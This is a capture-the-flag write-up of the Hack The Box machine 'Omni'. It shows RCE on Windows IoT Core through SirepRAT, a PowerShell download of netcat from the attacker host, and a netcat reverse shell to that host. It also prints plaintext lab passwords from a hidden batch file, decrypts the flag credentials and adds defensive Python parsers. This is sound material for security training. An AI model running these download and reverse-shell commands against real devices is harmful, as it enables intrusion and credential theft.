
Omni Writeup [HTB]

Omni is a Windows IoT machine rated easy on Hack The Box. It consists of exploiting an RCE vulnerability to gain initial access and then using some PowerShell tricks to find credentials and decrypt files.

Enumeration

Running nmap:

```console
nmap -sC -sV 10.10.10.204
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 16:50 EST
Nmap scan report for 10.10.10.204
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Accessing port 8080 prompts for credentials.

Researching Windows Device Portal, we learn that the machine is running Windows 10 IoT Core.

Port 8080 corresponds to the Device Portal; trying the default credentials Administrator:p@ssw0rd did not work.

Exploitation

Doing more research, I found a tool that provides RCE on this platform: SirepRAT.

I confirmed the RCE was working by running the following command:

```console
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user" --v
User accounts for \\

-------------------------------------------------------------------------------
Administrator            app                      DefaultAccount
DevToolsUser             Guest                    sshd
WDAGUtilityAccount
The command completed with one or more errors.
```

Then I decided to upload nc.exe and tried to obtain a reverse shell:

```console
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -Uri http://10.10.14.44/nc.exe" --v
```

Unfortunately, this did not work:

```console
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e powershell.exe 10.10.14.44 443" --v
---------
---------
This version of C:\Windows\System32\spool\drivers\color\nc.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

---------
---------
```

Then I managed to get a reverse shell by using a 64-bit version of netcat:

```console
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -e powershell.exe 10.10.14.44 443" --v
```

```console
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.204] 49693
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
omni$
```

Reading user.txt, we find the following:

```console
PS C:\Data\users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">...</SS>
    </Props>
  </Obj>
</Objs>
```

Here we have a PSCredential in XML format. Looking for a way to decrypt it, I found a blog post explaining how to do it.

But when I ran the first command, which converts the XML back into a PowerShell object, I got access denied to the path:

```console
PS C:\Data\users\app> $credential = Import-CliXml -Path C:\Data\users\app
$credential = Import-CliXml -Path C:\Data\users\app
Import-CliXml : Access to the path 'C:\Data\users\app' is denied.
```
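The user.txt above is what Export-CliXml produces for a PSCredential. As an added example (not from the writeup), the parser below reads the parts that are recoverable offline and checks that the Password element is a DPAPI blob: ConvertFrom-SecureString protects it in CurrentUser scope, so only the exporting account on the exporting machine can unprotect it, and a shell running as a different account (omni$ here) could not have read it even with the right file path. The XML sample is constructed in the same shape as user.txt; its hex value is a stand-in, not a blob from the box.

```python
import xml.etree.ElementTree as ET

PS_NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
# Every DPAPI blob opens with version 1 and the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian byte order.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample in the same shape as user.txt; the hex is a stand-in
# for the real ciphertext, not a blob taken from the machine.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000</SS>
    </Props>
  </Obj>
</Objs>"""


def parse_pscredential(clixml: str) -> dict:
    """Extract what can be read offline from a serialized PSCredential.

    UserName is stored in clear. Password is a SecureString that
    ConvertFrom-SecureString wrapped with DPAPI (CurrentUser scope), so it
    only unprotects as the exporting user on the exporting machine.
    """
    root = ET.fromstring(clixml)
    types = [t.text for t in root.findall(".//ps:TN/ps:T", PS_NS)]
    if "System.Management.Automation.PSCredential" not in types:
        raise ValueError("not a serialized PSCredential")
    props = root.find(".//ps:Props", PS_NS)
    user = props.find("ps:S[@N='UserName']", PS_NS)
    ss = props.find("ps:SS[@N='Password']", PS_NS)
    if user is None or ss is None:
        raise ValueError("PSCredential is missing UserName or Password")
    blob = bytes.fromhex(ss.text.strip())
    return {
        "username": user.text,
        "dpapi_protected": blob.startswith(DPAPI_MAGIC),
        "ciphertext_len": len(blob),
    }
```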

After some time enumerating, I decided to take advantage of PowerShell and looked for files with specific Windows extensions, so I ran the following command:

```powershell
PS C:\> Get-ChildItem -Force -Recurse -Include *.bat,*.vbs,*.xls,*.doc
```

That searched recursively for files with those extensions, and -Force also listed hidden files.

From the output of that command I got this interesting file:

```console
Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-h--        8/21/2020  12:56 PM            247 r.bat

PS C:\Program Files\WindowsPowershell\Modules\packagemanagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
```
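The r.bat above is a persistence script that resets two account passwords in plaintext and strips every member of the local Administrators group in a loop. As an added example (not from the writeup), the scanner below does what the Get-ChildItem hunt did, but also inspects script contents for those two patterns, so a defender can sweep script directories for them; the SAMPLE_RBAT content is constructed after r.bat with placeholder passwords, and the extension list is an assumption.

```python
import os
import re

SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs"}

# 'net user <account> <password>' with a literal third token resets a password
# in plaintext; tokens such as '*', '/add' or '/active:no' are not secrets.
NET_USER_RE = re.compile(
    r"^\s*net\s+user\s+(\S+)\s+(?![*/])\S+", re.IGNORECASE | re.MULTILINE)
# A loop that deletes every member of the local Administrators group.
GROUP_STRIP_RE = re.compile(
    r'net\s+localgroup\s+"?administrators"?\s+\S+\s+/delete', re.IGNORECASE)

# Constructed sample modelled on r.bat; passwords are placeholders.
SAMPLE_RBAT = """@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app SAMPLE_PW_1
net user administrator SAMPLE_PW_2
net user guest /active:no
ping -n 3 127.0.0.1
cls
GOTO :LOOP
"""


def scan_text(text: str) -> list:
    """Return (finding, account) tuples; the password itself is never recorded."""
    findings = [("plaintext_password_reset", acct.lower())
                for acct in NET_USER_RE.findall(text)]
    if GROUP_STRIP_RE.search(text):
        findings.append(("admin_group_stripping", "administrators"))
    return findings


def scan_tree(root: str) -> dict:
    """Walk root (hidden files included, like Get-ChildItem -Force) and map
    each script that has findings to them."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                results[path] = hits
    return results
```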

So there we have some credentials for the Windows Device Portal; we will try the app user first.

We get a successful login and find a utility to run commands, so we will get a new reverse shell.

This time we have a shell as the app user:

```console
PS C:\windows\system32> $env:Username
$env:Username
app
```

So we can just repeat the whole process to decrypt the user flag:

```console
PS C:\Data\Users\app> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
```

Privilege Escalation

Now it is time to log in to the Windows Device Portal with the administrator credentials. We repeat the same steps as before and obtain a shell as Administrator:

```console
PS C:\windows\system32> $env:Username
$env:Username
Administrator
```

Finally, we just need to get the root flag:

```console
PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
$credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
```

This post is licensed under CC BY 4.0 by the author.